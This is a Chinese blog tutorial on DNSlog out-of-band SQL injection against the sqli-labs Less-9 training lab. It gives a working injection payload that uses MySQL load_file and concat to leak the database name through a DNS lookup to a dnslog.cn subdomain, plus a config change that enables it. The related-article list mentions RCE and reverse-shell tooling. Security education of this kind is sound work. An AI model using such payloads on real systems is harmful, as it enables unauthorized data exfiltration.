DNSlog回显

最新推荐文章于 2023-12-08 05:11:42 发布
最新推荐文章于 2023-12-08 05:11:42 发布
阅读量921 收藏 2
点赞数
分类专栏: 网络安全 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/127256145
版权

跟报错注入有异曲同工之处

报错注入是从返回的错误报告中获取得到的数据,而DNSlog是记录查询的记录获取信息。

http://127.0.0.1:88/Less-9/?id=1’ and (select load_file (concat(‘\\’,(select database()),‘.4dxa8g.dnslog.cn\xxx.txt’)))–+

报错利用是updatexml函数,而DNSlog是用的loadfile函数

那么有意思的来了,loadfile会会去网上读取文件。

我们不妨翻译一下下面的语句

concat('\\\\',(select database()),'.4dxa8g.dnslog.cn\\xxx.txt'))

concat是拼接函数,主要的是database()这个函数,会返回当前表的名称,我们加上Hello为当前表的名称.

后面的网址是DNSlog随机网址,一会实践将会更换.

最后的xxx.txt则是文件的名称,不用管有没有,就是意思一下

有两个\就会被转义为单个\

那么这句话会被转义为

\\hello.4dxa8g.dnslog.cn\xxx.txt

我们先来个简单的实践,看看DNSlog是否真的记得住

我们先去(www.dnslog.cn)去得到一个域名

然后我们把上面得到的语言改一下

\\hello.om7svv.dnslog.cn\xxx.txt

好了,打开浏览器试一下

没有文件,很正常

返回DNSlog看一下

好了,让我们进入实战

本教程基于Less-9实践(在虚拟机上试一下,在云服务器上似乎会被哪里给挡住了)

先去DNSlog获得域名

再将上面的语句中的域名改为得到的域名

?id=1’ and (select load_file (concat(‘\\’,(select database()),‘.要改的域名,前面的点必须保留\xxx.txt’)))–+

运行返回DNSlog查得到的结果

这便是DNSlog回显的方式了


我们在什么情况下使用回显呢?

  1. 在用时间盲注和布尔盲注时,达到一定限制封锁ip的情况(比方说sqlmap进行,然后封锁ip)
  2. 懒得用时间盲注和布尔盲注

如果没有正常回显结果,那么就有可能是权限不足,需要在my.ini中加入一下语句

secure_file_priv=“”

真不想起名TAT
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
dfdhxb995397的博客
12-28 881
作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用! 符号:` `名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将...
【老火柴擦出新火花】利用DNSlog进行更高效率的无回显渗透测试
jklbnm12的博客
07-17 2070
目录0.说在前面0.1.DNSlog工具1.什么是DNSlog2.DNSlog回显原理3.DNSlog通常用在哪些地方3.1.SQL注入盲注3.2.XSS盲打3.3.无回显的命令执行3.4.无回显的SSRF3.5.无回显的XXE(Blind XXE) 0.说在前面 0.1.DNSlog工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog 另外我们也可以使用在线平台: http://
利用DNS协议回显数据
hl1293348082的专栏
03-28 417
这个问题已经是去年提出的了,之前也看到过,在 CTF 题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。 这里对原理进行一波总结,并利用了 CEYE 平台 http://ceye.io/ 成功的进行了原理复现利用。 原理分析 这个虽然是利用到了比如说 mysql 的 LOAD_FILE 函数,其实本质还是对 windows 的资源管理器的一个利用,利用协议 // 去进行一个子域名的 DNS 解析,将你需要的(你取得的一些有用信息当做子域名信息给传递出来) 先了解下
DNSLog漏洞探测(一)之DNSLog介绍
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 3368
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
SQL注入之利用DNSlog外带盲注回显
baynk的博客
03-31 5754
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
DNSlog注入学习
mingyqf的博客
06-03 1554
原文链接:https://www.cnblogs.com/Xy–1/p/12896599.html 作者: Lushun之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入)
柠檬i的博客
08-07 1015
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
利用 DNSLog回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 548
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
Fastjson漏洞的识别与DNSlog回显
tpaer的博客
09-02 4155
Fastjson RCE漏洞实战POC探测方式
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog回显原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
预警事项:Fastjson反序列化远程代码执行漏洞风险预警
05-24
阿里巴巴发布关于Fastjson安全公告,在1.2.80及以下版本中存在反序列化风险。Fastjson是阿里巴巴的开源JSON解析库,可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到...
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
SharpNetCheck:内置网渗透过程中,对可以出网的机器是十分渴望的。在收集大量弱密码的情况下,一个人去测试能不能出网太麻烦了。所以就有了这个工具,可配合如wmiexec ,psexec等横向工具进行批量检测,该工具可以在dnslog回显内网IP地址和计算机名,可实现内网中的快速定位可出网机器
03-21
所以就有了这个工具,可配合如wmiexec,psexec等横向工具进行批量检测,该工具可以在dnslog回显内网IP地址和计算机名,可实现内网中的快速定位可出网机器。 > SharpNetCheck.exe Author: Uknow Github: ...
shiro-check:Shiro反序列化回显利用,内存外壳,检查Burp插件
03-21
四郎检查3.0增加了一些回显有效载荷,增加了基于过滤... 2.0增加了回显,及100个键,20个键的扫描选项,利用了burp内置的dnslog api(协作者)基于ysoserial的小工具URLDNS进行DNS查询验证此漏洞! #release中提供下载
ShiroRce-Burp
04-24
ShiroRce-Burp集成了四种回显方式,一种反弹 shell方式HttpRequest回显Tomcat回显Spring回显DnsLog执行命令回显回显手动加header头cmd可选择cmd执行任意命令选择ReverseShell为反弹 shell原生java反弹shell可支持win...
写bat脚本双击执行
qq_35911118的博客
04-08 2578
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
渗透测试 回显机制平台 dnslog 搭建
whatday的专栏
08-07 2378
目录 1 前言 2 前期准备 3 实验过程 3.1 添加DNS解析 3.2 对外开放53端口 3.3 DNSLOG代码 4 WEB界面 5 后记 1 前言 DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。 2 前期准备 一个域名...
渗透实录-02
qq_32660043的博客
12-22 272
一次渗透实录。
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显你觉得是什么原因?
05-21
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显,可能有以下一些原因: 1. 防火墙阻止了发出的 ICMP 包或者 DNS 请求,导致无法连接到 DNSLog。 2. DNSLog 服务器已经宕机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值